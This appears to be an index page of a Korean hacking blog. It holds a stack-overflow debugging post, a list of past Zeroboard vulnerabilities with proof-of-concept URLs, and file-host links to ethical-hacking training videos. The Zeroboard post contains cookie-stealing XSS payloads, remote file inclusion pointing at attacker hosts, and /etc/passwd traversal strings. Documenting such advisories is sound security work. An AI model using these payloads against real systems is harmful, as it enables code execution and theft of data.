Hacking and Reverse Engineering : )

seaofglass.egloos.com

Overflow로 인한 무한루프 Reverse Engineering


cygwin 환경에서 Overflow 시 무한루프가 발생하는 것을 발견하였다.


gcc버전은 3.4.5이다. 이 코드를 단순하게 컴파일 하고 실행한다.
파라미터를 넣어서 실행해 본다

Overflow가 buffer를 넘어 ebp 까지만을 덮을 것이다.

실행 결과 무한 루프가 발생하는 것을 볼 수 있다.

원인을 살피기 위해서 디버거에서 인수값을 28개만 주고 열어준다.

이 부분에서 strcpy 함수를 실행하고 printf 함수로 "test\n"란 문자열을 화면에 찍어줄 것이다.

버퍼를 보면 알겠지만 ebp 까지 덮어써졌다.

그런데 이 그림은 printf 함수를 실행하고 나서 다시 실행될 때의 캡쳐화면이다.

0x0022FF4C를 살펴보면 이 부분이 RET(Return Address) 주소 값인데

중요한 것은 파라미터 값이 덮어 씌어질 때 31323334~~~38 (문자열 28개)가 들어가고

그 다음에 "0x00" (문자열이 종료되는 것을 알려주는 NULLl pointer)가 들어간다는 사실이다.

그래서 RET가 0x40124B에서 0x401200으로 변경되고 프로그램은 0x40120부터 다시 실행 되는 것이다.

그래서 무한 루프가 된다.

무한 루프가 발생하는 것이 신기해서 "NULL"이 들어가는 것을 생각하지 못하고 분석해 보았다.

워낙 쉬운내용이라 기술적인 내용은 없고 재미로 올려본다 ^^
트랙백(0)덧글(0)

지난 zeroboard 취약점 2 Web Security

http://nchovy.kr/forum/2/article/493

http://visu4l.tistory.com/179

http://www.happyjung.com/gnuboard/bbs/board.php?bo_table=lecture&wr_id=449&sca=%EC%A0%9C%EB%A1%9C%EB%B3%B4%EB%93%9C

http://ncafe.kr/tipand-no-5.html
트랙백(0)덧글(0)

지난 제로보드 취약점 Web Security

■ 크로스사이트 스크립팅 취약점(2005.02.19)
The following proof of concept examples are available:
http://www.example.com/zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%
3Cscript%3Ealert(document.cookie)%3C/script%3E

http://www.example.com/zboard.php?
id=union_schdule&year=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert
(document.cookie)%3C/script%3E

http://www.example.com/skin/dir/view_image.php?
filename=ALBANIAN%20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%
3C/script%3E

http://www.example.com/zboard.php?id=link&page=ALBANIAN%
20RULEZ='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


■ Print_Category.PHP 원격 File Include 취약점(2005.01.13)
http://www.example.com/[zeroboard]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/


■ DIR 파라미터 원격 File Include 취약점(2005.01.13)
The following proof of concept examples are available:
http://www.example.com/skin/zero_vote/error.php?dir=http://[ATTACKER]
http://www.example.com/skin/zero_vote/login.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/setup.php?dir=http://[attacker]/
http://www.example.com/skin/zero_vote/ask_password.php?dir=http://[attacker]/


■ 다중 File Disclosure 취약점(2005.01.13)
http://www.example.com/_head.php?_zb_path=../../../../../etc/passwd%00
http://www.example.com/include/write.php?dir=../../../../../etc/passwd%00
http://www.example.com/outlogin.php?_zb_path=../../../../../etc/passwd%00


■ 다중원격 스크립트 삽입과 크로스사이트 스크립팅 취약점(2004.12.24)
http://www.example.com/outlogin.php?_zb_path=ftp://[attacker]/pub/
http://www.example.com/include/write.php?dir=http://[attacker]/
http://www.example.com/check_user_id.php?user_id=<script>alert(document.cookie)</sc
ript>


■ 악성 PHP 삽입(2002.06.14)
We checked the vulnerability with "http://BOARD_URL/_head.php?_zb_path=WANTED_TO_INCLUDE"
and
made a sample code, alib.php,

--------------------alib.php--------------
<? passthru("/bin/ls"); ?>
-----------------------------------------

and type the following URL to invoke this sample code.

TEST URL : http://BOARD_URL/_head.php?_zb_path=http://MYBOX/a"

-------out put----------------------------
_foot.php _head.php admin admin.php admin_sendmail_ok.php admin_setup.php apply_vote.php
check_user_id.php comment_ok.php config.php data del_comment.php del_comment_ok.php
delete.php delete_ok.php download.php error.php icon image_box.php images
include index.html install.php install1.php install2.php install2_ok.php install_ok.php
latest_skin lib.php license.txt list_all.php login.php login_check.php
logout.php lostid.php lostid_search.php member_join.php member_join_ok.php member_memo.php
member_memo2.php member_memo3.php member_modify.php member_modify_ok.php
member_out.php open_window.php outlogin.php outlogin_skin schema.sql script
select_list_all.php send_message.php setup.php skin style.css view.php view_info.php
view_info2.php view_preview.php vote.php write.php write_ok.php zboard.php
zipcode
Fatal error: Call to undefined function: dbconn() in /home/morris/public_html/tmp/bbs/_head.php
on line 41
-----------------------------------------


■ PHP Include File 명령실행 취약점(2002.01.15)
PHP Source file a.php
<? passthru("/bin/ls"); ?>

Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a

트랙백(0)덧글(1)

방화벽 API Windows Related

http://www.codeproject.com/KB/cpp/firewallpapi.aspx

http://www.eggheadcafe.com/forumarchives/win32programmernetworks/Sep2005/post23800465.asp

http://www.yustsoft.net/bbs/zboard.php?id=study&page=1&sn1=on&divpage=1&sn=on&ss=off&sc=off&keyword=%B9%DA%B7%E6%C8%AF&select_arrange=headnum&desc=asc&no=19

트랙백(0)덧글(0)

Certified Ethical Hacker V6 Videos Etc

DVD CEH v6 Vol 1
http://www.mediafire.com/?sharekey=86eb05437783626f91b20cc0d07ba4d2ad1aab09128d2ae6

DVD CEH v6 Vol 2
http://www.mediafire.com/?sharekey=86eb05437783626f91b20cc0d07ba4d280a56c67b7af8ade

DVD CEH v6 Vol 3
http://www.mediafire.com/?sharekey=283842fd3dc3e7ef91b20cc0d07ba4d21c75a918e4e1d695

DVD CEH v6 Vol 4

Part 01-05
http://www.mediafire.com/?qyxlbbmzzoz

http://www.mediafire.com/?ewptkvwjjsb

http://www.mediafire.com/?wd0pqdhp0dm

http://www.mediafire.com/?yojymmdj9u0

http://www.mediafire.com/?11soyyfi0bg

part 06-10
http://www.mediafire.com/?h0ztj0pm0sb

http://www.mediafire.com/?ybbn3dydlnm

http://www.mediafire.com/?jhkpkd0veiz

http://www.mediafire.com/?et9smil0vod

http://www.mediafire.com/?wdan234s2fy

part 11-13
http://www.mediafire.com/?mzasjj2icyl

http://www.mediafire.com/?g0ndietlmvt

http://www.mediafire.com/?itcexdmjzbx

sfv
http://www.mediafire.com/?mgcnwhojwow

용량이 꽤 많더라고요...

꼭 필요하신 분만 알아서 잘 받아가세요;;
트랙백(0)덧글(0)

ECSA LP Etc

http://www.4shared.com/file/129583904/6e977cf7/Ec_Council_-_Ecsa-Lp_Training_.html
트랙백(0)덧글(0)

윤리적 해커 Etc

http://www.4shared.com/file/192309278/f2cc49ee/CEHpart1.html
http://www.4shared.com/get/192390406/2ea0a367/CEHpart2.html
트랙백(0)덧글(0)
1 2 3 4 5 6 7 8 9 10 다음
seaofglass.egloos.com is powered by Egloos. Subscribe to RSS Skin design by egloos.